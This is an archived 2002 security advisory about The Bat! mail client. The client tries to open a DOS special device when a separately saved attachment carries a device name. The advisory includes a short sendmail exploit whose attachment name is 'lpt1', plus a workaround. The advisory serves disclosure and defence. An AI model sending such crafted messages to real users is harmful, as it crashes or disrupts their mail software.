TUCoPS :: Windows Net Apps :: WIN5153.HTM

The Bat! DoS via dos-device specs in mail header
28th Feb 2002 [SBWID-5153]
COMMAND

	The Bat! DoS via dos-device specs in mail header

SYSTEMS AFFECTED

	The Bat! 1.53d, 1.54beta

PROBLEM

	In 3APA3A advisory  [http://www.security.nnov.ru/advisories/archdos.asp]
	:
	

	The Bat! has special device access bug. If The  Bat!  is  configured  to
	save attachment apart from  message  bodies  and  file  has  a  name  of
	special device The Bat! will attempt to open special device.
	

	Exploit : =======
	

	bash-2.03$ sendmail -U test@test.com

	From: test

	To: test

	Content-Type: apllication/exe; name=lpt1

	

	Test

	.   

	

SOLUTION

	No patch yet. Check [http://www.thebat.net].
	

	Workaround:
	

	Disable   \"Keep   attachment   files   separately\"   option   or   use
	Account/Dispatch Mail On Server option  to  delete  problematic  message
	from server.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH